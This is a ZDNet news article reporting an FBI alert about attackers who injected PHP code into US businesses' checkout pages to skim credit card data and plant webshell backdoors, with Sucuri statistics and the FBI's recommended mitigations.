FBI: Hackers used malicious PHP code to grab credit card data – ZDNet

Unidentified attackers accessed credit card data and created a backdoor into the victim’s systems, says law enforcement agency.
Liam Tung is a full-time freelance technology journalist who writes for several Australian publications.
The Federal Bureau of Investigations (FBI) is warning that someone is scraping credit card data from the checkout pages of US businesses’ websites. 
“As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said in an alert.
It said the “unidentified cyber actors” also established backdoor access to the victim’s system by modifying two files within the checkout page. 
SEE: Just in time? Bosses are finally waking up to the cybersecurity threat
JavaScript-based Magecart card-skimming attacks have been the main threat to e-commerce sites in recent years, but PHP code remains a major source of card skimming activity. 
The attackers began targeting US businesses in September 2020 by inserting malicious PHP code into the customized online checkout pages. But earlier this year, the actors changed tactics using a different PHP function.  
The actors create a basic backdoor using a debugging function that allows the system to download two webshells onto the US firm’s web server, giving the attackers backdoors for further exploitation. 
The FBI’s recommended mitigations include changing default login credentials on all systems, monitoring requests performed against your e-commerce environment to identify possible malicious activity, segregating and segmenting network systems to limit how easily cyber criminals can move from one to another, and securing all websites transferring sensitive information by using secure socket layer (SSL) protocol.
Security firm Sucuri observed that 41% of new credit card skimming malware samples in 2021 were from PHP backend credit card skimmers. This suggested that solely scanning for frontend JavaScript infections could be missing a large proportion of credit card skimming malware. 
As Sucuri explains, webshell backdoors give attackers full access to the website file system, often providing a full picture of the environment, including the server operating system and PHP versions, as well powerful functionality to change permissions of files and move into adjacent websites and directories. Webshells accounted for 19% of 400 new malware signatures gathered by Sucuri in 2021. The firm saw a “hugely disproportionate” rise in signatures in 2021 for PHP-based credit card stealers impacting e-commerce platforms Magento, WordPress and OpenCart.   
Government hackers made hundreds of thousands of stolen credit cards ‘worthless’ to crooks

American Express, Google to make Chrome’s Autofill with a credit card more secure

The 3 best Amazon Business credit cards: Your credit options explained

The 5 best push mowers: Top gas, electric, and manual walk-behind lawn mowers

The 12 best cheap tech gifts under $50

The 13 best home gym equipment machines: For all budgets

Learn your way around SAP for under $40 with this developer course bundle

Kensington BlackBelt Rugged Case with Integrated Mobile Dock for Surface Pro 8: Durable and convenient

The 5 best gaming mechanical keyboards: Fast and accurate

Please review our terms of service to complete your newsletter subscription.
You agree to receive updates, promotions, and alerts from You may unsubscribe at any time. By joining ZDNet, you agree to our Terms of Use and Privacy Policy.
You agree to receive updates, promotions, and alerts from You may unsubscribe at any time. By signing up, you agree to receive the selected newsletter(s) which you may unsubscribe from at any time. You also agree to the Terms of Use and acknowledge the data collection and usage practices outlined in our Privacy Policy.
© 2022 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED. Privacy Policy | Cookie Settings | Advertise | Terms of Use


Related Post

Leave a Reply

Your email address will not be published.

Translate »